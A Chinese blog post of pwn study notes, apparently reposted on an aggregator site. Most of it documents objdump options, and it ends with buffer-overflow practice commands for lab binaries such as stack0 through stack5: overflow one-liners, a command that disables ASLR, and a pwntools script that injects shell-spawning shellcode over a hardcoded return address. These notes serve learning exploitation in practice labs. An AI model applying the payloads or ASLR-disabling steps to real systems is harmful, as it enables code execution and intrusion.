pwn波c语言程序,pwn的一些命令
objdump命令
--archive-headers
-a
顯示檔案庫的成員信息,類似ls-l將lib*.a的信息列出。
-b bfdname
--target=bfdname
指定目標碼格式。這不是必須的,objdump能自動識別許多格式,比如:
objdump -b oasys -m vax -h fu.o
顯示fu.o的頭部摘要信息,明確指出該文件是Vax系統下用Oasys編譯器生成的目標文件。objdump -i將給出這里可以指定的目標碼格式列表。
-C
--demangle
將底層的符號名解碼成用戶級名字,除了去掉所開頭的下劃線之外,還使得C++函數名以可理解的方式顯示出來。
--debugging
-g
顯示調試信息。企圖解析保存在文件中的調試信息并以C語言的語法顯示出來。僅僅支持某些類型的調試信息。有些其他的格式被readelf-w支持。
-e
--debugging-tags
類似-g選項,但是生成的信息是和ctags工具相兼容的格式。
--disassemble
-d
從objfile中反匯編那些特定指令機器碼的section。
-D
--disassemble-all
與-d類似,但反匯編所有section.
--prefix-addresses
反匯編的時候,顯示每一行的完整地址。這是一種比較老的反匯編格式。
-EB
-EL
--endian={big|little}
指定目標文件的小端。這個項將影響反匯編出來的指令。在反匯編的文件沒描述小端信息的時候用。例如S-records.
-f
--file-headers
顯示objfile中每個文件的整體頭部摘要信息。
-h
--section-headers
--headers
顯示目標文件各個section的頭部摘要信息。
-H
--help
簡短的幫助信息。
-i
--info
顯示對于-b或者-m選項可用的架構和目標格式列表。
-j name
--section=name
僅僅顯示指定名稱為name的section的信息
-l
--line-numbers
用文件名和行號標注相應的目標代碼,僅僅和-d、-D或者-r一起使用使用-ld和使用-d的區別不是很大,在源碼級調試的時候有用,要求編譯時使用了-g之類的調試編譯選項。
-m machine
--architecture=machine
指定反匯編目標文件時使用的架構,當待反匯編文件本身沒描述架構信息的時候(比如S-records),這個選項很有用。可以用-i選項列出這里能夠指定的架構.
--reloc
-r
顯示文件的重定位入口。如果和-d或者-D一起使用,重定位部分以反匯編后的格式顯示出來。
--dynamic-reloc
-R
顯示文件的動態重定位入口,僅僅對于動態目標文件意義,比如某些共享庫。
-s
--full-contents
顯示指定section的完整內容。默認所有的非空section都會被顯示。
-S
--source
盡可能反匯編出源代碼,尤其當編譯的時候指定了-g這種調試參數時,效果比較明顯。隱含了-d參數。
--show-raw-insn
反匯編的時候,顯示每條匯編指令對應的機器碼,如不指定--prefix-addresses,這將是缺省選項。
--no-show-raw-insn
反匯編時,不顯示匯編指令的機器碼,如不指定--prefix-addresses,這將是缺省選項。
--start-address=address
從指定地址開始顯示數據,該選項影響-d、-r和-s選項的輸出。
--stop-address=address
顯示數據直到指定地址為止,該項影響-d、-r和-s選項的輸出。
-t
--syms
顯示文件的符號表入口。類似于nm-s提供的信息
-T
--dynamic-syms
顯示文件的動態符號表入口,僅僅對動態目標文件意義,比如某些共享庫。它顯示的信息類似于nm -D|--dynamic顯示的信息。
-V
--version
版本信息
--all-headers
-x
顯示所可用的頭信息,包括符號表、重定位入口。-x等價于-a -f -h -r -t同時指定。
-z
--disassemble-zeroes
一般反匯編輸出將省略大塊的零,該選項使得這些零塊也被反匯編。
@file可以將選項集中到一個文件中,然后使用這個@file選項載入。
將C函數編譯為二進制程序:
$ gcc stack0.c-o stack0-fno-stack-protector -m32
gcc-ghello.c-ohello
g++-ghello.cpp-ohello
使用python打印并輸入本地程序
$ python -c "print 'A'*65" | ./stack0
$ python -c "print'A'*64+'\x64\x63\x62\x61'" | xargs ./stack1
這里的 xargs 表示輸入數據作為參數。
$./overflow1-3948d17028101c40$(python-c 'print"A"*64+ "B"')
當程序調用環境變量時,可修改環境變量
$ export GREENIE=`python -c 'print "A"*64 + "\x0a\x0d\x0a\x0d"'`
開啟core dump的記錄功能。
ulimit -cunlimited
sudo sh -c 'echo"/tmp/core.%t" > /proc/sys/kernel/core_pattern'
制造溢出
$ python -c "print 'A'*200" | ./stack5
$ gdb stack5 /tmp/core.1522317467
gdb-peda$ x/10s $esp-0x50
$strace./overflow3-28d8a442fb232c0c$(python-c'print"A"*76+"BBBB"')
關閉Linux系統的ASLR保護。
sudo sh -c"echo 0 > /proc/sys/kernel/randomize_va_space"
判斷當前是否開啟ASLR保護。
$setarch `uname -m`-R ./overflow4-4834efeff17abdfb/$(python-c 'print "A"*76 + "BBBB"')
from pwn import *
io = process('./stack5')
sc = asm(shellcraft.i386.sh())
payload = sc
payload += ((0x48+4)-len(sc)) * 'a'
payload += '\x20\xcf\xff\xff'
io.sendline(payload)
io.interactive()ROPgadget --binary ./stack4
總結
以上是生活随笔為你收集整理的pwn波c语言程序,pwn的一些命令的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: LOL猴子怎么出装(艾欧尼亚VS诺克萨斯
- 下一篇: 2017二级c语言成绩,2017全国计机